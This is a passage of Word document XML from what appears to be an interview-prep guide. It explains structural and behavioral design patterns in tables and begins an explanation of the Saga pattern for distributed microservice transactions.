          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Except for the creational design pattern, can you explain other design patterns?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="419"/>
    </w:p>
    <w:p w14:paraId="0DA0B649" w14:textId="47E4D3C9" w:rsidR="002E0126" w:rsidRPr="00FE4147" w:rsidRDefault="002E0126" w:rsidP="00FE4147">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Yes, apart from </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Creational Design Patterns</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, there are two other main categories:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697DD82C" w14:textId="77777777" w:rsidR="002E0126"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2A0B070">
          <v:rect id="_x0000_i2026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDAFF08" w14:textId="77777777" w:rsidR="002E0126" w:rsidRPr="00FE4147" w:rsidRDefault="002E0126"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1. Structural Design Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7690BA"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">They deal with </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>object composition</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – how classes and objects are combined to form larger structures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9AF999" w14:textId="77777777" w:rsidR="002E0126" w:rsidRPr="00FE4147" w:rsidRDefault="002E0126"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Common Structural Patter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4"/>
        <w:gridCol w:w="9150"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="743357DD" w14:textId="77777777" w:rsidTr="002E0126">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A664E1B" w14:textId="77777777" w:rsidR="002E0126" w:rsidRPr="00FE4147" w:rsidRDefault="002E0126"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Pattern</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31CF2E63" w14:textId="77777777" w:rsidR="002E0126" w:rsidRPr="00FE4147" w:rsidRDefault="002E0126"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="6E0EE2FB" w14:textId="77777777" w:rsidTr="002E0126">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70BEB98F"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Adapter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FE1A1F3"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Converts one interface into another the client expects. Example: LegacyRectangleAdapter adapting an old class to a new system.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="69D3CC93" w14:textId="77777777" w:rsidTr="002E0126">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C26B31D"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Bridge</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03B24A2A"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Separates abstraction from implementation, allowing both to vary independently. Example: Remote control (abstraction) + TV brand (implementation).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="02A738BB" w14:textId="77777777" w:rsidTr="002E0126">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D5C20C1"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Composite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="526187E5"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Composes objects into tree structures (part-whole hierarchies). Example: Files and folders in a filesystem.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="64FAE80F" w14:textId="77777777" w:rsidTr="002E0126">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64381DEC"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Decorator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57E0C538"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Adds responsibilities to objects dynamically without altering the original class. Example: Wrapping a coffee object with milk and sugar decorators.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="7FA502D5" w14:textId="77777777" w:rsidTr="002E0126">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08A564D0"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Facade</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C193F7A"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rovides a simplified interface to a complex system. Example: One method hides multiple subsystems like JDBC calls.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="06FE8711" w14:textId="77777777" w:rsidTr="002E0126">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="786AAB93"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Flyweight</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F450C88"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Reduces memory usage by sharing common parts of objects. Example: Characters in a document – only one instance per character.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="33D8BC1C" w14:textId="77777777" w:rsidTr="002E0126">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D90397E"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Proxy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50FA77F4"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rovides a placeholder or surrogate for another object to control access. Example: Virtual proxy for lazy loading images.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1CB54A4D" w14:textId="77777777" w:rsidR="002E0126"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9DA975">
          <v:rect id="_x0000_i2027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F0346D" w14:textId="77777777" w:rsidR="002E0126" w:rsidRPr="00FE4147" w:rsidRDefault="002E0126"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2. Behavioral Design Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27182C3D"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These focus on </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>communication between objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and responsibility delegation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6565F6B3" w14:textId="77777777" w:rsidR="002E0126" w:rsidRPr="00FE4147" w:rsidRDefault="002E0126"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Common Behavioral Patter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9"/>
        <w:gridCol w:w="8275"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="795D54AD" w14:textId="77777777" w:rsidTr="002E0126">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13B6295D" w14:textId="77777777" w:rsidR="002E0126" w:rsidRPr="00FE4147" w:rsidRDefault="002E0126"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Pattern</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E5DA3AF" w14:textId="77777777" w:rsidR="002E0126" w:rsidRPr="00FE4147" w:rsidRDefault="002E0126"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="285A4B52" w14:textId="77777777" w:rsidTr="002E0126">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C866477"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Observer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AC8E733"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One-to-many dependency, subject notifies observers on state change.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="58331920" w14:textId="77777777" w:rsidTr="002E0126">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B0860AE"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Strategy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B71CF85"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Defines a family of algorithms, encapsulates them, and makes them interchangeable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="5ADF1E61" w14:textId="77777777" w:rsidTr="002E0126">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B57CB8C"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Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32289B6B"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Encapsulates a request as an object, allowing undo/redo. Example: Remote control with command buttons.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="29788FD8" w14:textId="77777777" w:rsidTr="002E0126">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C9D4628"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Template Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78993AFA"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Defines skeleton of algorithm, letting subclasses redefine specific steps.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="1133EEF4" w14:textId="77777777" w:rsidTr="002E0126">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1133113C"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State</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F28F460"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Allows an object to change behavior when its internal state changes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="5F7E8797" w14:textId="77777777" w:rsidTr="002E0126">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1062C5A9"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Chain of Responsibility</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38458EA8"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asses request along a chain of handlers. Example: Support ticket system (Level 1 → Level 2).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="35588A5F" w14:textId="77777777" w:rsidTr="002E0126">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14248D6A"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Mediator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5951E204"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Central controller that manages communication between objects (no direct communication).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="077B5E29" w14:textId="77777777" w:rsidTr="002E0126">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20C12CF7"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Iterator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DE6BA07"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rovides a way to traverse elements in a collection sequentially.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="40137E8C" w14:textId="77777777" w:rsidTr="002E0126">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22D8068A"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Memento</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="547FA616"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Captures an object’s internal state for restoring later. Example: Undo feature.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="153CB3C2" w14:textId="77777777" w:rsidTr="002E0126">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46EA918F"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Interpreter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FDEE67A"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Defines a grammar and interpreter for a language. Example: Boolean expression parser.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="6616BE22" w14:textId="77777777" w:rsidTr="002E0126">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54C8E05C"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Visitor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3953FCD1" w14:textId="77777777" w:rsidR="002E0126" w:rsidRPr="00FE4147" w:rsidRDefault="002E012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Lets you define new operations without changing the classes of elements. Useful in hierarchical structures like XML/ASTs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="118900E3" w14:textId="77777777" w:rsidR="002E0126"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07AAF37">
          <v:rect id="_x0000_i2028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF3B278" w14:textId="77777777" w:rsidR="002E0126" w:rsidRPr="00CE4B95" w:rsidRDefault="002E0126" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">These design patterns help create </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>flexible, scalable, and maintainable</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> code in large-scale software systems by promoting best practices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E020F6A" w14:textId="26F7C09F" w:rsidR="008D0DCC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008D0DC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8F2D590">
          <v:rect id="_x0000_i2029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3939B871" w14:textId="673D54AC" w:rsidR="003C003F" w:rsidRPr="00CE4B95" w:rsidRDefault="00B76115">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="420" w:name="_Toc196307900"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Saga design pattern</w:t>
      </w:r>
      <w:r w:rsidR="003C003F" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="420"/>
    </w:p>
    <w:p w14:paraId="65D53B2C" w14:textId="0B4F841B" w:rsidR="00244286" w:rsidRPr="00FE4147" w:rsidRDefault="00244286" w:rsidP="00FE4147">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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The </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Saga Design Pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>microservices pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> used to manage </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>long-running distributed transactions</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a system where a single transaction is broken down into a series of smaller, isolated transactions (or steps). Each transaction updates a service and ensures eventual consistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404BE325"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Unlike traditional transactions, where all operations either succeed or fail (ACID properties), a </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Saga</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> enables </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>distributed transactions</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
